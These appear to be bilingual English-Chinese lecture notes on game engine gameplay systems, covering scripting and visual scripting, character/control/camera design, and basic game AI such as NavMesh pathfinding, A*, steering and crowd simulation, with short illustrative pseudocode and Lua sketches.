    • Lightweight and highly extensible

      轻量且高度可扩展

    Python (used in The Sims 4, EVE Online)

    ​Python(用于《模拟人生 4》、《星战前夜》)

    • Reflection support

      反射支持

    • Built-in object-oriented support

      内置面向对象支持

    • Extensive standard libraries and third-party modules

      广泛的标准库和第三方模块

    C# (compiled to bytecode offline, used in Unity)

    ​C#(离线字节码,用于 Unity)

    • Low learning curve, easy to read and understand

      学习难度低,易于阅读和理解

    • Built-in object-oriented support

      内置面向对象支持

    • Great community with lots of active developers

      拥有大量活跃开发人员的优秀社区

    webp

    Visual Scripting

    ​可视化脚本

    Why We Need Visual Scripting

    ​为什么我们需要可视化脚本

    • Friendly to non-programmers, especially designers and artists

      对非程序员,尤其是设计师和艺术家来说很友好

    • Less error-prone with drag-drop operations instead of code writing

      使用拖放操作代替代码编写,更不容易出错

    webp

    Visual Script is a Programming Language

    ​Visual Script 是一种程序语言

    Visual script is also a programming language, which usually needs

    ​Visual Script 也是一种编程语言,通常需要

    • Variable

      变量

    • Statement and Expression

      语句和表达式

    • Control Flow

      控制流

    • Function

      函数

    • Class (for object-oriented programming language)

      类(用于面向对象编程语言)

    webp

    Variable

    ​变量

    Preserve the data to be processed or output

    ​保存要处理或输出的数据

    • Type

      类型

      • Basic type, e.g. integer, floating

        基本类型,例如整数、浮点数

      • Complex type, e.g. structure

        复杂类型,例如结构体

    • Scope

      作用域

      • Local variable

        局部变量

      • Member variable

        成员变量

    webp

    Variable Visualization - Data Pin and Wire

    ​变量可视化 - 数据引脚和数据线

    Use data wires through data pins to pass variables (parameters)

    ​通过数据引脚使用数据线传递变量(参数)

    • Each data type uses a unique pin color

      每种数据类型都使用独特的引脚颜色

    webp

    Statement and Expression

    ​语句和表达式

    Control how to process data

    ​控制如何处理数据

    • Statement: expresses some action to be carried out

      语句:表达要执行的某些操作

      • Assignment Statement

        赋值语句

      • Function Statement

        函数语句

    • Expression: to be evaluated to determine its value

      表达式:要进行求值以确定其值

      • Function Expression

        函数表达式

      • Math Expression

        数学表达式

    webp

    Statement and Expression Visualization - Node

    ​语句和表达式可视化 - 节点

    Use nodes to represent statements and expressions

    ​使用节点表示语句和表达式

    • Statement Node

      语句节点

    • Expression Node

      表达式节点

    webp

    Control Flow

    ​控制流

    Control the statement execution order

    ​控制语句的执行顺序

    • Sequence

      顺序

      • By default statements are executed one by one

        默认情况下,语句会逐个执行

    • Conditional

      条件

      • Next statement is decided by a condition

        下一个语句由条件决定

    • Loop

      循环

      • Statements are executed iteratively until the condition is not true

        语句会迭代执行,直到条件不成立

    webp

    Control Flow Visualization - Execution Pin and Wire

    ​控制流可视化 - 执行引脚和连线

    Use execution wires through execution pins to sequence statements

    ​使用执行连线通过执行引脚来制作语句序列

    • Use control statement nodes to make different control flow

      使用控制语句节点来制作不同的控制流

    webp

    Function

    ​函数

    A logic module which takes in data, processes it and returns result(s)

    ​接收数据、处理数据并返回结果的逻辑模块

    • Input Parameter

      输入参数

      • The input data required to be processed

        需要输入以进行处理的数据

    • Function Body

      函数主体

      • Control how to process data

        控制如何处理数据

    • Return value(s)

      返回值

      • The data to be returned

        要返回的数据

    webp

    Function Visualization - Function Graph

    ​函数可视化 - 函数图

    Use a graph with connected nodes to make a function

    ​使用带有连接节点的图来制作函数

    webp

    Class

    ​类

    A prototype for a kind of objects

    ​一种对象的原型

    • Member Variable

      成员变量

      • The lifetime is managed by the object instance

        生命周期由对象实例管理

    • Member Function

      成员函数

      • Can access member variables directly

        可以直接访问成员变量

      • May be overridden by derived classes

        可能被派生类覆盖

    webp

    Class Visualization - Blueprint

    ​类可视化 - 蓝图

    Use blueprint to define a class that inherits from a native class

    ​使用蓝图定义从本机类继承的类

    • Event Callback Functions

      事件回调函数

    • Member Functions

      成员函数

    • Member Variables

      成员变量

    webp

    Make Graph User Friendly

    ​使图表更方便用户使用

    • Fuzzy finding

      模糊查找

    • Accurate suggestions by type

      按类型提供准确建议

    Visual Script Debugger

    ​可视化脚本调试器

    Debugging is an important step in development

    ​调试是开发过程中的重要步骤

    Provide user-friendly debug tools for visual scripting

    ​为可视化脚本提供用户友好的调试工具

    webp

    Issues with Visual Scripting (1/2)

    ​可视化脚本问题 (1/2)

    Visual scripts are hard to merge in team work

    ​可视化脚本很难在团队合作中合并

    • Usually a visual script is stored as a binary file

      通常,可视化脚本以二进制文件形式存储

    • Manually reordering the script graph is inefficient and error-prone even with a merge tool

      即使使用合并工具,手动重新排序脚本图也效率低下且容易出错

    webp

    Issues with Visual Scripting (2/2)

    The graph can get pretty messy with complex logic

    ​图表可能因逻辑复杂而变得相当混乱

    • Need uniform graph layout rules for team work

      团队合作需要统一的图表布局规则

    webp

    Script and Graph are Twins

    ​脚本和图是双胞胎

    webp

    “3C” in Game Play

    What is 3C?

    3C: Character, Control & Camera

    ​3C:角色、控制和摄像头

    3C is the primary element that determines the gameplay experience

    ​3C 是决定游戏体验的主要元素

    webp

    Character

    ​角色

    In-game characters, both player and NPC.

    ​游戏中的角色,包括玩家和 NPC。

    Includes character movement, combat, health/mana, what skills and talents they have, etc.

    ​包括角色移动、战斗、生命值、他们拥有的技能和天赋等。

    One of the most basic elements of a character is movement.

    ​角色最基本的元素之一是移动。

    webp

    Character: Well-designed Movement

    ​角色:精心设计的动作

    Movement looks simple, but it’s hard to do well.

    ​动作看似简单,但做好却很难。

    In AAA games, every basic state of action needs to be broken down into detailed states.

    ​在 AAA 游戏中,每个基本动作状态都需要分解为详细状态。

    webp

    Extended Character: More complex and varied states

    ​扩展角色:更加复杂多样的状态

    webp

    • Hanging

      悬挂

    • Skating

      滑冰

    • Diving

      跳水

    Extended Character: Cooperate with other systems

    ​扩展角色:与其他系统配合

    Game effects, sound, environment interaction.

    ​游戏特效、声音、环境互动。

    Extended Character: More realistic motion with Physics

    ​扩展角色:更逼真的物理运动

    • Airflow

      气流

    • Inertia tensor

      惯性张量

    • Torque

      扭矩

    webp

    Movement State Machine

    ​运动状态机

    webp

    Control

    ​控制

    Different input device

    ​不同的输入设备

    Different game play

    ​不同的游戏玩法

    webp

    A Good Example of Control

    From Input to Game Logic

    webp

    Control: Zoom in and out

    ​控制:放大和缩小

    Control: Aim Assist

    ​控制:瞄准辅助

    webp

    This improves the player experience: without aim assist, the latency (from receiving the input signal to spawning the projectile in logic) may make it impossible for players to aim.

    Control: Feedback

    ​控制:反馈

    webp

    Some moments make the gamepad vibrate.

    Control: Context Awareness

    ​控制:情境感知

    Context-sensitive controls

    ​情境敏感控制

    • The same input button produces different effects in different game scenarios

      同一输入按钮在不同的游戏场景中产生不同的效果

    webp

    Control: Chord & Key Sequences

    ​控制:和弦和按键序列

    webp

    Chords

    ​和弦

    • when pressed at the same time, produce a unique behavior in the game

      同时按下时,在游戏中产生独特的行为

    Key Sequences

    ​按键序列

    • Gesture detection is generally implemented by keeping a brief history of the HID actions performed by the player

      手势检测通常通过保存玩家执行的 HID 操作的简要历史记录来实现

    Camera: Subjective Feelings

    ​相机:主观感受

    webp

    Camera Basic: POV & FOV

    ​摄像机基础:POV 和 FOV

    POV (point of view)

    ​POV(视点)

    • determines the position of the player to observe

      确定玩家观察的位置

    FOV (field of view)

    ​FOV(视野)

    • determines the size of the player’s viewing angle

      确定玩家视角的大小

    webp

    Camera Binding

    ​摄像机绑定

    Using POV and rotation to bind.

    ​使用 POV 和旋转进行绑定。

    webp

    Camera Control

    ​相机控制

    webp

    The camera's position relative to the character should not be completely fixed.

    Camera Track

    ​相机轨迹

    webp

    Camera Effects

    ​相机特效

    Provide the camera with more post-visual effects, such as filters and shake.

    ​为相机提供更多后期视觉效果,如滤镜和抖动。

    webp

    Many Cameras: Camera Manager

    ​多个摄像机:相机管理

    Camera: Subjective Feelings

    ​相机:主观感受

    Complex effects are often achieved through multiple basic adjustments. Taking creating a sense of speed as an example, we can:

    ​复杂的效果往往需要通过多次基础调整来实现。以营造速度感为例,我们可以这样做:

    • Add lines in the speed direction

      在速度方向上添加线条

    • The character falls backwards

      角色向后倒下

    • Motion blur

      动态模糊

    • Zoom in FOV (to speed up changes in screen content)

      放大 FOV(以加快屏幕内容的变化)

    Loose feeling

    ​放松的感觉

    • Relax camera movement

      放松镜头运动

    webp

    Cinematic

    ​电影

    • filter, motion, sound, narrator, model, animation, camera movement, …

      滤镜、动作、声音、旁白、模型、动画、镜头运动……

    webp

    Camera

    ​相机

    For artists and designers to optimize the effect:

    ​供艺术家和设计师优化效果:

    • Inheritable classes

      可继承的类

    • Function that can be accessed by Blueprint

      蓝图可访问的函数

    • Adjustable parameters

      可调整的参数

    webp

    Everything is Gameplay.

    References

    Event Mechanism

    Script

    Visual Scripting

    Gameplay and 3C

    Lecture 16: Game Engine Gameplay Systems - Basic AI

    Basic Artificial Intelligence

    ​基础人工智能

    Outline of Artificial Intelligence Systems

    ​人工智能系统概述

    AI Basics

    ​人工智能基础

    • Navigation

      导航

    • Steering

      转向

    • Crowd Simulation

      人群模拟

    • Sensing

      感知

    • Classic Decision Making Algorithms

      经典决策算法

    Advanced AI

    ​高级人工智能

    • Planning and Goals

      规划和目标

    • Machine Learning

      机器学习

    Navigation

    ​导航

    Navigation in Games

    ​游戏中的导航

    Find paths from a location to another in an automatic manner

    ​自动查找从一个位置到另一个位置的路径

    webp

    Three Steps of Navigation

    ​导航三步骤

    webp

    • Map representation

      地图表示

    • Path finding

      路径查找

    • Path smoothing

      路径平滑

    Map Representations - Walkable Area

    ​地图表示 - 可行走区域

    • We need to tell AI agents where they can walk - the walkable area

      我们需要告诉人工智能代理他们可以走到哪里 - 可行走区域

    • Walkable area of players is determined by character motion capabilities

      玩家的可行走区域由角色运动能力决定

      • Physical Collision

        物理碰撞

      • Climbing slope/height

        爬坡/高度

      • Jumping distance

        跳跃距离

    • Simulating the movement of AI agents as if they were players costs too much

      模拟人工智能代理作为玩家的移动成本太高

    • AI agents are still expected to have the same walkable area as players

      人工智能代理仍然需要与玩家拥有相同的可行走区域

    Map Representations - Formats

    ​地图表示 - 格式

    • Waypoint Network

      航点网络

    • Grid

      网格

    • Navigation Mesh

      导航网格

    • Sparse Voxel Octree

      稀疏体素八叉树

    Waypoint Network

    ​航点网络

    • Network connecting critical points (waypoints) from the map

      连接地图上关键点(航点)的网络

    • Waypoint sources:

      航点来源:

      • Designed important locations (red points in the figure below)

        设计重要位置

      • Corner points to cover walkable area (green points in the figure below)

        角点覆盖可步行区域

      • Internal points to connect near-by waypoints, adding flexibility to navigation (blue points in the figure below)

        内部点连接附近的航点,为导航增添灵活性

    webp

    Warcraft used a waypoint network.

    Using a waypoint network is similar to using a subway system

    ​航点网络的使用方式与地铁系统类似

    • Find the nearest points to get on and off the network

      查找最近的上下车点

    • Plan the path on the waypoint network

      规划航点网络上的路径

    webp

    Pros:

    ​优点:

    • Easy to implement

      易于实施

    • Fast path finding, even for large maps

      路径查找速度快,即使对于大型地图也是如此

    Cons:

    ​缺点:

    • Limited flexibility: must go to the nearest point in the network before navigation

      灵活性有限:导航前必须前往网络中的最近点

    • Waypoint selection requires manual intervention

      航点选择需要人工干预

    webp

    Grid

    ​网格

    • Intuitive discretization of map

      直观的地图离散化

    • Uniform subdivision into small regular grid shapes

      均匀细分为小的规则网格形状

    • Common grid shapes

      常见的网格形状

      • Square

        正方形

      • Triangle

        三角形

      • Hexagon

        六边形

    webp

    Hexagonal grids like those in Civilization V are not easy to allocate storage for in memory.

    Grid property could be modified in runtime to reflect dynamic environmental changes

    ​可以在运行时修改网格属性以反映动态环境变化

    webp

    Pros:

    ​优点:

    • Easy to implement

      易于实现

    • Uniform data structure

      统一的数据结构

    • Dynamic

      动态

    Cons:

    ​缺点:

    • Accuracy depends on grid resolution

      精度取决于网格分辨率

    • Dense grid lowers pathfinding performance

      密集的网格会降低寻路性能

    • High memory consumption

      内存消耗高

    • Hard to handle 3D map

      难以处理 3D 地图

    webp

    Grids are hard to use for 3D maps.

    Navigation Mesh (NavMesh)

    ​导航网格 (NavMesh)

    • Solves the problem of representing overlapped walkable areas

      解决表示重叠可行走区域的问题

    • Approximates the walkable area of character controller based on physical collision and motion capabilities

      根据物理碰撞和运动能力估计角色控制器的可行走区域

    • Lowers network density to boost pathfinding performance

      降低网络密度以提高寻路性能

    webp

    NavMesh Example

    ​NavMesh 示例

    Neighboring 3D convex polygons to represent walkable areas

    ​相邻的 3D 凸多边形表示可行走区域

    webp

    Convex Polygon of NavMesh

    ​NavMesh 的凸多边形

    Why convex polygon?

    ​为什么是凸多边形?

    • Pathfinding generates a series of polygons (a polygon corridor) that need to be walked through

      寻路会生成一系列需要穿过的多边形(多边形走廊)

    • Convexity guarantees the final path is limited to the polygons and two adjacent polygons have only one common edge (portal)

      凸性保证最终路径仅限于多边形内,并且两个相邻多边形只有一个共同边(传送门)

    webp

    NavMesh Pros & Cons

    ​NavMesh 的优缺点

    Pros:

    ​优点:

    • Support 3D walkable surface

      支持 3D 可行走表面

    • Accurate

      准确

    • Fast in pathfinding

      寻路速度快

    • Flexible for selection of start/destination

      可灵活选择起点/终点

    • Dynamic

      动态

    Cons:

    ​缺点:

    • Complex generation algorithm

      生成算法复杂

    • Does not support 3D space

      不支持 3D 空间

    webp

    Sparse Voxel Octree

    ​稀疏体素八叉树

    • Represents “flyable” 3D space

      表示“可飞行”的 3D 空间

    • Similar to spatial partitioning

      类似于空间分区

    • Finest-level voxels represent complicated boundaries

      最精细级别的体素表示复杂边界

    • Coarser-level voxels represent uniform regions

      较粗糙级别的体素表示均匀区域

    webp

    Path Finding

    ​路径查找

    Distances in map representations can be abstracted as edge costs in graph

    ​地图表示中的距离可以抽象为图中的边成本

    webp

    webp

    Depth-First Search

    ​深度优先搜索

    Expand most recently added

    ​展开最近添加的

    Breadth-First Search

    ​广度优先搜索

    Expand least recently added

    ​展开最早添加的

    Dijkstra Algorithm

    for each vertex v:
        dist[v] = ∞
        prev[v] = none
    dist[source] = 0
    set all vertices to unexplored
    while destination not explored:
        v = least-valued unexplored vertex
        set v to explored
        for each edge (v, w):
            if dist[v] + len(v, w) < dist[w]:
                dist[w] = dist[v] + len(v, w)
                prev[w] = v

    Dijkstra always finds the shortest distance between two points in the graph.

    A Star (A*)

    • Expand lowest cost in list

      扩展列表中成本最低的元素

    • Distance is known distance from source + heuristic

      距离是距源的已知距离 + 启发式

    • Greedy: stops when it reaches the goal

      贪婪:达到目标时停止

    A* - Cost calculation

    Cost calculation: $f(n) = g(n) + h(n)$

    ​成本计算:$f(n) = g(n) + h(n)$

    • $g(n)$: the exact cost of the path from the start to node $n$

      $g(n)$:从起点到节点 $n$ 的路径的准确成本

    • $h(n)$: the estimated cost from node $n$ to the goal

      $h(n)$:从节点 $n$ 到目标的估计成本

    webp
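
    To make the cost function concrete, here is a compact Lua sketch of A* on a 4-connected grid (an illustrative sketch, not engine code; the `walkable` callback is an assumption and the per-step cost $D_1$ is fixed to 1).

    local function manhattan(a, b)
        return math.abs(a.x - b.x) + math.abs(a.y - b.y)   -- h(n) on a grid
    end

    local function a_star(start, goal, walkable)
        local function key(n) return n.x .. "," .. n.y end
        local open = { [key(start)] = start }
        local g = { [key(start)] = 0 }                      -- exact cost from start
        local f = { [key(start)] = manhattan(start, goal) } -- f(n) = g(n) + h(n)
        local came_from = {}
        while next(open) do
            -- pick the open node with the lowest f (a heap would be faster)
            local ck, current
            for k, n in pairs(open) do
                if not ck or f[k] < f[ck] then ck, current = k, n end
            end
            if current.x == goal.x and current.y == goal.y then
                -- reconstruct the path by walking back through came_from
                local path = { current }
                while came_from[key(path[1])] do
                    table.insert(path, 1, came_from[key(path[1])])
                end
                return path
            end
            open[ck] = nil
            for _, d in ipairs({ {1, 0}, {-1, 0}, {0, 1}, {0, -1} }) do
                local nb = { x = current.x + d[1], y = current.y + d[2] }
                local nk = key(nb)
                if walkable(nb.x, nb.y) and (g[nk] == nil or g[ck] + 1 < g[nk]) then
                    g[nk] = g[ck] + 1                       -- D1 = 1 per step
                    f[nk] = g[nk] + manhattan(nb, goal)
                    came_from[nk] = current
                    open[nk] = nb
                end
            end
        end
        return nil   -- no path found
    end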

    A* - Heuristic On Grids

    ​A* - 网格启发式算法

    • For 4 directions of movement, we can use Manhattan distance

      对于 4 个移动方向,我们可以使用曼哈顿距离(来计算 $g(n)$ 和 $h(n)$)

    • $D_1$: cost for moving to the adjacent node

      $D_1$:移动到相邻节点的成本

    • $h(n)=D_1\cdot(d_x+d_y)$

      • $d_x=|x_n-x_{goal}|, d_y=|y_n-y_{goal}|$

    webp

    A*- Heuristic On NavMesh

    ​A*- NavMesh 上的启发式方法

    Multiple choices when evaluating cost on NavMesh

    ​评估 NavMesh 上的成本时有多种选择

    • Using polygon centers or vertices usually over-estimate the cost

      使用多边形中心或顶点通常会高估成本

    • Using hybrid method introduces too many points to check

      使用混合方法会引入太多要检查的点

    • Midpoints of edges - a good balance

      (选用区域的)边缘的中点 - 良好的平衡

    webp

    • On a navigation mesh that allows any angle of movement, use a straight line distance

      在允许任意角度移动的导航网格上,使用直线距离

    • Use the midpoint of the edge entering the current node as the node cost calculation point

      使用进入当前节点的边缘中点作为节点成本计算点

    • $D$: the cost for moving unit distance in any direction

      $D$:向任意方向移动单位距离的成本

      • $h(n)=D\cdot\sqrt{d_x\cdot d_x+d_y\cdot d_y}$
      • $d_x=|x_n-x_{goal}|, d_y=|y_n-y_{goal}|$

    webp

    A*-NavMesh Walkthrough

    ​A*-NavMesh 演练

    webp

    A*- Heuristic

    ​A*- 启发式

    • $h(n)$ controls $A^*$'s behavior.

      $h(n)$ 控制 $A^*$ 的行为。

    • With 100% accurate estimates, get shortest paths quickly

      以 100% 准确的估计,快速获得最短路径

    • Too low, continue to get shortest paths, but slow down

      太低,继续获得最短路径,但速度会减慢

    • Too high, exit early without the shortest path

      太高,提前退出,得不到最短路径

    Balance between pathfinding speed and accuracy

    ​在寻路速度和准确性之间取得平衡

    Path Smoothing

    ​路径平滑

    • Why we need path smoothing

      为什么我们需要路径平滑

      • Zigzag, many unnecessary turns

        之字形,许多不必要的转弯

    • “String Pulling”- Funnel Algorithm

      “拉线”- 漏斗算法

    webp

    Path Smoothing-Funnel Algorithm

    ​路径平滑漏斗算法

    • The scope of the funnel is the possible scope of the path

      漏斗的范围是路径的可能范围

    • Narrow the funnel if necessary to fit the portal

      必要时缩小漏斗以适应门户

    webp

    Terminate when the goal is in the funnel

    ​当目标处于漏斗中时终止

    webp

    NavMesh Generation - Voxelization

    ​NavMesh 生成-体素化

    Sample the collision scene by voxelization

    ​通过体素化对碰撞场景进行采样

    webp

    NavMesh Generation - Region Segmentation

    ​NavMesh 生成-区域分割

    • Calculate the distance of each voxel to border

      计算每个体素到边界的距离

    • Mark border voxels by AgentRadius to avoid clipping

      通过 AgentRadius 标记边界体素以避免剪切

    webp

    Watershed Algorithm

    ​分水岭算法

    • Gradually “flood” the “terrain”

      逐渐“淹没”“地形”

    • Form a “watershed” (dividing ridge) when “pools” meet

      当“水池”相遇时形成“分水岭”

    webp

    Segment the “neighboring" voxels into regions to provide a good basis for polygon mesh

    ​将“相邻”体素分割成区域,为多边形网格提供良好的基础

    webp

    Regions don’t have overlapping voxels in 2D

    ​区域在 2D 中没有重叠体素

    webp

    NavMesh Generation - Mesh Generation

    ​NavMesh 生成-网格生成

    Generate NavMesh from segmented regions

    ​从分段区域生成 NavMesh

    webp

    There are now plugins that implement this.

    NavMesh Advanced Features - Polygon Flags

    ​NavMesh 高级功能-多边形标记

    Useful for marking terrain types: plains, mountain, water, etc.

    ​用于标记地形类型:平原、山脉、水域等。

    • “Paint colors" to add user-defined regions

      “绘制颜色”以添加用户定义的区域

    • Polygons generated from user-defined regions have special flag

      从用户定义的区域生成的多边形具有特殊标记

    webp

    NavMesh Advanced Features - Tile

    ​NavMesh 高级功能-Tile

    • Fast for responding to dynamic objects

      快速响应动态对象

    • Avoid rebuilding the entire NavMesh

      避免重建整个 NavMesh

    • TileSize - trade-off between pathfinding and dynamic rebuilding performance

      TileSize- 寻路和动态重建性能之间的权衡

    webp

    In a game, the navigation mesh may change at runtime.

    NavMesh Advanced Features - Off-mesh Link

    ​NavMesh 高级功能-网格外链接

    Allow agents to jump or teleport

    ​允许代理跳跃或传送

    webp

    Steering

    ​转向

    From Path to Motion

    ​从路径到运动

    • Cars cannot follow planned path exactly

      汽车无法完全遵循计划的路径(车辆具有转向半径)

    • The motion of cars is limited by their motion abilities:

      汽车的运动受到其运动能力的限制:

      • Linear acceleration (throttle/brake)

        线性加速度(油门/刹车)

      • Angular acceleration (steering force)

        角加速度(转向力)

    • Motion needs to be adjusted according to the limits

      运动需要根据限制进行调整

    webp

    Steering Behaviors

    ​转向行为

    webp

    • Seek / Flee

      寻找 / 逃跑

    • Velocity Match

      速度匹配(从起点出发加速,减速到终点停止)

    • Align

      对齐(让车头朝着某个方向)

    Seek/Flee

    ​寻找/逃跑

    Steer the agent towards / away from the target

    ​引导代理朝向/远离目标

    • In essence, position matching

      本质上是位置匹配

    • Accelerate with max acceleration towards / away from the target

      以最大加速度朝向/远离目标加速

    • Will oscillate around the target

      会围绕目标振荡

    • Input:

      输入:

      • Self position

        自身位置

      • Target position

        目标位置

    • Output:

      输出:

      • Acceleration

        加速度

    webp
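
    A minimal Lua sketch of the two behaviors (illustrative only; the vector helpers `vec_sub`, `vec_scale`, `normalize` and the `max_acceleration` field are assumptions):

    function seek(agent, target_pos)
        -- accelerate at maximum strength towards the target
        local dir = normalize(vec_sub(target_pos, agent.position))
        return vec_scale(dir, agent.max_acceleration)
    end

    function flee(agent, target_pos)
        -- same as seek, but accelerate away from the target
        local dir = normalize(vec_sub(agent.position, target_pos))
        return vec_scale(dir, agent.max_acceleration)
    end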

    Seek / Flee Variations

    ​寻找 / 逃离变体

    Modifying the target in runtime can generate new steering behaviors

    ​在运行时修改目标可以生成新的转向行为

    webp

    • Pursue

      追寻

    • Path Following

      路径跟随

    • Wander

      漫游

    • Flow Field Following

      流场跟随

    Velocity Match

    ​速度匹配

    Matches the target velocity

    ​匹配目标速度

    • Calculate acceleration from matching time and velocity differences

      根据匹配时间和速度差异计算加速度

    • Clamp the acceleration by maximum acceleration of agents

      通过代理的最大加速度限制加速度

    • Input:

      输入:

      • Target velocity

        目标速度

      • Self velocity

        自身速度

      • Matching time

        匹配时间

    • Output:

      输出:

      • Acceleration

        加速度
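
    A minimal Lua sketch of velocity match (same assumed vector helpers as above, plus `vec_length`): the acceleration is the velocity difference divided by the matching time, clamped to the agent's maximum.

    function velocity_match(agent, target_velocity, matching_time)
        -- acceleration needed to match the target velocity within matching_time
        local accel = vec_scale(vec_sub(target_velocity, agent.velocity),
                                1.0 / matching_time)
        -- clamp by the agent's maximum acceleration
        if vec_length(accel) > agent.max_acceleration then
            accel = vec_scale(normalize(accel), agent.max_acceleration)
        end
        return accel
    end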

    Align

    ​对齐

    Matches target orientation

    ​匹配目标方向

    • Input:

      输入:

      • Target orientation

        目标方向

      • Self orientation

        自身朝向

    • Output:

      输出:

      • Angular acceleration

        角加速度

    webp

    Crowd Simulation

    ​人群模拟

    Crowd

    ​人群

    A large group of individuals share information in the same environment alone or in a group

    ​一大群人单独或成群地在同一环境中分享信息

    • Collision avoidance

      避免碰撞

    • Swarming

      蜂拥

    • Motion in formation

      形成队列运动

    webp

    Crowd Simulation Models

    ​人群模拟模型

    • Started from “Boids” system of Reynolds

      从雷诺的 “Boids” 系统开始

    • Three families of models:

      三个模型系列:

      • Microscopic models

        微观模型

        • “Bottom-Up”

          “自下而上”

        • Focus on individuals

          关注个体

      • Macroscopic models

        宏观模型

        • Crowd as a unified and continuous entity

          人群作为一个统一且连续的实体

      • Mesoscopic models

        中观模型

        • Divide the crowd into groups

          将人群分成几组

    Microscopic Models-Rule-based Models

    ​微观模型-基于规则的模型

    Flock dynamics of animal crowds emerge from modeling the motion of each individual with simple predefined rules:

    ​通过使用简单的预定义规则对每个个体的运动进行建模,将动物群体的群体动态视为一种突发行为:

    • Separation: to steer away from all of its neighbors

      分离:远离所有邻居

    • Cohesion: to steer towards the “center of mass”

      凝聚:转向“重心”

    • Alignment: to line up with agents close by

      对齐:与附近的代理对齐

    webp

    • Separation

      分离

    • Cohesion

      凝聚

    • Alignment

      对齐

    webp

    Easy to implement, but not suitable for simulating complex behavior rules.

    ​易于实现,但不适合模拟复杂的行为规则。
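
    A minimal Lua sketch of the three rules combined into one steering vector (illustrative; the vector helpers and the weight values are assumptions):

    function boids_steering(agent, neighbors)
        local sep = { x = 0, y = 0 }   -- separation: steer away from neighbors
        local coh = { x = 0, y = 0 }   -- cohesion: steer towards center of mass
        local ali = { x = 0, y = 0 }   -- alignment: match neighbor velocities
        for _, n in ipairs(neighbors) do
            sep = vec_add(sep, vec_sub(agent.position, n.position))
            coh = vec_add(coh, n.position)
            ali = vec_add(ali, n.velocity)
        end
        local count = #neighbors
        if count == 0 then return { x = 0, y = 0 } end
        coh = vec_sub(vec_scale(coh, 1 / count), agent.position)
        ali = vec_scale(ali, 1 / count)
        local w_sep, w_coh, w_ali = 1.5, 1.0, 1.0   -- tuning weights (assumed)
        return vec_add(vec_add(vec_scale(sep, w_sep), vec_scale(coh, w_coh)),
                       vec_scale(ali, w_ali))
    end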

    Macroscopic Models

    ​宏观模型

    Simulate crowd motion from a macro perspective

    ​从宏观角度模拟人群运动

    • Treat the crowd as a unified and continuous entity

      将人群视为统一且连续的实体(避免逐个计算影响性能)

    • Control motions with potential field or fluid dynamics

      用势场或流体动力学控制运动

    • Does not consider interactions between individuals and the environment at the individual level

      不考虑个体与环境在个体层面上的相互作用

    webp

    Mesoscopic Models

    ​中观模型

    Simulate crowd motion taking care of both details and the whole

    ​模拟人群运动,兼顾细节和整体

    • Divide the crowd into groups

      将人群分成几组

    • Deals with interactions between groups and individuals in each group

      处理群体之间以及每个群体中个人之间的互动

    • combinations of microscopic models and formation rules or psychological models

      微观模型与形成规则或心理模型的组合

    webp

    Collision Avoidance - Force-based Models

    ​碰撞避免 - 基于力的模型

    • A mixture of socio-psychological and physical forces influencing the behavior in a crowd

      影响人群行为的社会心理和物理力量的混合

    • The actual movement of an individual depends on the desired velocity and its interaction with the environment

      个人的实际运动取决于所需速度及其与环境的相互作用

    • Can simulate dynamical features of escape crowd panic

      可以模拟逃离人群恐慌的动态特征

    webp

    Pros:

    ​优点:

    • can be extended to simulate more emergent behaviors of human crowds

      可以扩展以模拟更多人群突发行为

    Cons:

    ​缺点:

    • Similar to physics simulation, the simulation step should be small enough

      与物理模拟类似,模拟步长应该足够小

    webp

    Collision Avoidance - Velocity-based Models

    ​碰撞避免-基于速度的模型

    Consider the neighbor information to make decisions in velocity space

    ​考虑邻居信息以在速度空间中做出决策

    • able to simulate in local space

      能够在局部空间中进行模拟

    • applied to collision avoidance

      应用于碰撞避免

    Reciprocal velocity obstacle methods - the current standard collision avoidance algorithms

    ​相互速度障碍方法-当前标准碰撞避免算法

    • Velocity Obstacle (VO)

      速度障碍 (VO)

    • Reciprocal Velocity Obstacle (RVO)

      相互速度障碍 (RVO)

    • Optimal Reciprocal Collision Avoidance (ORCA)

      最佳相互碰撞避免 (ORCA)

    webp

    Velocity obstacle (VO)

    ​速度障碍 (VO)

    • Calculate its own dodge velocity, assuming other agent is unresponsive

      假设其他代理没有响应,计算自己的躲避速度

    • Appropriate for static and unresponsive obstacles

      适用于静态和无响应的障碍物

    • Overshoot

      超调

    • Causes oscillation between two agents attempting to avoid each other

      导致两个试图相互避开的代理之间发生振荡

    webp

    Reciprocal Velocity Obstacle (RVO)

    ​相互速度障碍 (RVO)

    • Assuming the other agent is using the same decision process (mutually cooperating)

      假设其他代理使用相同的决策过程(相互合作)

    • Both sides move half way out of the way of a collision

      双方各让开一半以避免碰撞

    • Only guarantees no oscillation and avoidance for two agents

      仅保证两个代理不会发生振荡和避免碰撞

    Optimal Reciprocal Collision Avoidance (ORCA)

    ​最佳相互碰撞避免 (ORCA)

    webp

    Sensing

    ​传感

    Sensing or Perception

    ​传感或感知

    webp

    Internal Information

    ​内部信息

    • Information of the agent itself

      agent 本身的信息

      • Position

        位置

      • HP

        生命值

      • Armor status

        护甲状态

      • Buff status

        增益状态

    • Can be accessed freely

      可自由访问

    Static Spatial information

    ​静态空间信息

    webp

    • Navigation Data

      导航数据

    • Tactical Map

      战术地图

    • Smart Object

      智能对象

    • Cover Point

      掩护点

    Dynamic Spatial information (1/2) - influence Map

    ​动态空间信息(1/2)- 影响力地图

    webp

    Dynamic Spatial Information (2/2) - Game Objects

    ​动态空间信息 (2/2) - 游戏对象

    • Information being sensed from a character

      从角色感知到的信息

    • Multiple character information can exist for a single character as it can be sensed by multiple agents

      单个角色可以存在多个角色信息,因为它可以被多个代理感知

    • Usually contains:

      通常包含:

      • Game Object ID

        游戏对象 ID

      • Visibility

        可见性

      • Last Sensed Method

        最后感知的方法

      • Last Sensed Position

        最后感知的位置

    Sensing Simulation

    ​传感模拟

    • Light, sound, and odor travels in space

      光、声音和气味在空间中传播

    • Have max traveling range

      具有最大传播范围

    • Attenuates in space and time with different patterns

      以不同的模式在空间和时间中衰减

      • Sight is blocked by obstacles

        视线被障碍物阻挡

      • Smelling ranges shrinks over time

        嗅觉范围随时间缩小

    • Radiating field can simulate sensing signals

      辐射场可以模拟传感信号

      • Can be simplified as Influence Map

        可以简化为影响图

      • Agents covered by the field can sense the information

        场覆盖的代理可以感知信息

    webp

    Classic Decision Making Algorithms

    ​经典决策算法

    Decision Making Algorithms

    ​决策算法

    • Finite State Machine

      有限状态机

    • Behavior Tree

      行为树

    • Hierarchical Task Network

      分层任务网络

    • Goal Oriented Action Planning

      目标导向行动规划

    • Monte Carlo Tree Search

      蒙特卡洛树搜索

    • Deep Learning

      深度学习

    Finite State Machine

    ​有限状态机

    • Change from one State to another according to some Conditions

      根据某些条件从一个状态变为另一个状态

